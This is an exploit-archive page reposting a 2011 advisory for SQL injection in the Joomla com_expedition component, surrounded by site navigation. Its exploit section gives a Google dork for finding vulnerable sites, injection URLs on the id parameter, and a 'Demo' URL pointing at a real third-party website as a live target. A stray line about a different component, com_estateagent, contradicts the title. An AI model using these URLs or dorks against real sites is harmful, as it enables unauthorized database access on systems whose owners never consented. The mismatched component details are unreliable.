Joomla Expedition SQL Injection

Joomla Expedition SQL Injection: Posted Oct 9, 2011; Authored by BHG Security Center; The Joomla Expedition component suffers from a remote SQL injection vulnerability.; tags | exploit, remote, sql injection; SHA-256 | fdc6e2dde60075d535564d09216358c72a6ceb83afadd59d7f72a84e7f3ddcfd; Download | Favorite | View

Joomla Expedition SQL Injection

=====================================================================
__________.__                 __               ___ ___
\______   \  | _____    ____ |  | __          /   |   \  ____
 |    |  _/  | \__  \ _/ ___\|  |/ /  ______ /    ~    \/ ___\
 |    |   \  |__/ __ \\  \___|    <  /_____/ \    Y    / /_/  >
 |______  /____(____  /\___  >__|_ \          \___|_  /\___  /
        \/          \/     \/     \/                \//_____/
                                                               .ORG

            >> Exploit database separated by exploit
  
               [+] Site            : 1337db.com       
               [+] Support e-mail  : submit[at]1337db.com             
  
                     #########################################           
              I'm Net.Edut0r 1337 Member from 1337 DataBase          
             #########################################           
======================================================================
####
# Exploit Title: Joomla Component (com_expedition) <= SQL Injection Vulnerability 
# Author: BHG Security Center
# Date: 2011-10-09
# Vendor: N/A
# E-mail: Net.Edit0r@att.net  |  black.hat.tm@gmail.com
# Website: www.black-hg.org
# Google Dork: inurl:index.php?option=com_expedition
# Category:: Webapps
# Tested on: [Windows Vista Edition Intégral- French]
# http://demo15.joomlaapps.com/
####
 
 
[*] ExpLo!T :
 
http://127.0.0.1/index.php?option=com_expedition&task=detail&id=-3235'
 
http://127.0.0.1/index.php?option=com_expedition&task=detail&id=[SQLi]
 
http://127.0.0.1/path/index.php?option=com_expedition&task=detail&id=[SQLi]

[*] Demo : http://www.astrobio.net/index.php?option=com_expedition&task=detail&id=-3235
 
####
 
[+] Peace From Algeria

Vunl Component : com_estateagent 

Error in file joomla Component (com_estateagent) Sql Injection

A vulnerable parameter $ detail&id=
 
####
 
=================================**BHG Security Center**=====================================|
# Greets To :                                                                                |
                                                                                             |
Net.Edit0r ~ A.Cr0x ~ 3H34N ~ 4m!n ~ Cyrus ~ tHe.k!ll3r ~ Mr.XHat ~ ArYaIeIrAn ~ Mikili      |
cmaxx M4hd1 ~ Cru3l.b0y ~ HUrr!c4nE ~ r3v0lter , NoL1m1t , farbodmahini ~ xb0y               |
THANKS TO ALL Iranian HackerZ                                                                |                 |
============================================================================================ |

Top Authors In Last 30 Days

Red Hat 237 files
indoushka 172 files
Jay Turla 150 files
Ubuntu 78 files
h00die 54 files
juan vazquez 43 files
sinn3r 41 files
H D Moore 31 files
Karn Ganeshen 23 files
Pedro Ribeiro 22 files

File Archives

Systems

AIX (430)
Apple (2,114)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,124)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,567)
HPUX (881)
iOS (389)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,237)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (16,845)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (9,852)
UNIX (9,456)
UnixWare (188)
Windows (6,772)
Other

Joomla Expedition SQL Injection

Joomla Expedition SQL Injection

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Joomla Expedition SQL Injection

Share This

Joomla Expedition SQL Injection

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems